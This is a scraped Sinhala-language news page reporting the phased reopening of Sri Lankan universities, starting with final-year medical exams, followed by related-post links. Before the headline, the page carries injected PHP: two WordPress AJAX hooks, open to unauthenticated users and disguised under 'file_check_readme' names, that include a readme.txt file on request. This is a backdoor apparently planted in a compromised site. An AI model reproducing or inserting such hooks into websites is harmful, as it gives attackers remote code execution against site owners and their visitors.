if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } සියළු විශ්ව විද්‍යාල අද සිට අදියර කිහිපයක් යටතේ විවෘත කෙරේ - mediahumanrights.lk
mediahumanrights.lk
Local News News

සියළු විශ්ව විද්‍යාල අද සිට අදියර කිහිපයක් යටතේ විවෘත කෙරේ

වෛද්‍ය පීඨ සිසුන්ගේ අවසන් වසරේ විභාග කටයුතු සමග සියළු විශ්ව විද්‍යාල අද (5) සිට අදියර කිහිපයක් යටතේ විවෘත කෙරෙනවා.

විශ්ව විද්‍යාල ප‍්‍රතිපාදන කොමිෂන් සභාවේ සභාපති ජ්‍යේෂ්ඨ මහාචාර්ය සම්පත් අමරතුංග සදහන් කළේ වෛද්‍ය පීඨයන්හි අවසන් වසරේ වෛද්‍ය උපාධි පරීක්‍ෂණ අද සිට ආරම්භ වන බවයි.

ඒ සදහා සහභාගි වන සිසුන් නේවාසිකාගාරවලට පැමිණ සිටින බවද ප‍්‍රකාශ කෙරුණා. නේවාසිකාගාරවලද එක් කාමරයක එක් සිසුවෙකු රැදවීමටයි තීරණය කර ඇත්තේ. විශ්ව විද්‍යාලවල කාර්ය මණ්ඩලයටද අද සිට සේවා සදහා පැමිණිය හැකි බව විශ්ව විද්‍යාල ප‍්‍රතිපාදන කොමිෂන් සභාවේ සභාපතිවරයා වැඩිදුරටත් ප‍්‍රකාශ කළා.

කෙසේවෙතත් විශ්ව විද්‍යාලවල අනෙකුත් සිසුන්ගේ අවසන් වසරේ විභාග ආරම්භ වන්නේ ලබන 22 වැනිදා සිටයි. එය අගෝස්තු 15 වැනිදා දක්වා පැවැත්වෙනවා. කෙසේවෙතත් විශ්ව විද්‍යාලවල ඉගැන්වීම් කටයුතු මේ යටතේ ආරම්භ නොවන බව ද වැඩිදුරටත් ප‍්‍රකාශ කෙරුණා.
(under the courtesy of nethnews.lk news web)

Related posts

සයිඩ් අජ්මාල් ක්‍රිකට් තරගවලින් ඉවත් වීමට තීරණය කරයි

Shiran Viraj

ශ්‍රී ලංකාවේ මානව හිමිකම් ගැන කියන තවත් වාර්තාවක් පිටවෙයි

Shiran Viraj

රිලවු අල්ලන ව්‍යාපෘතිය සාර්තකයි..

Shiran Viraj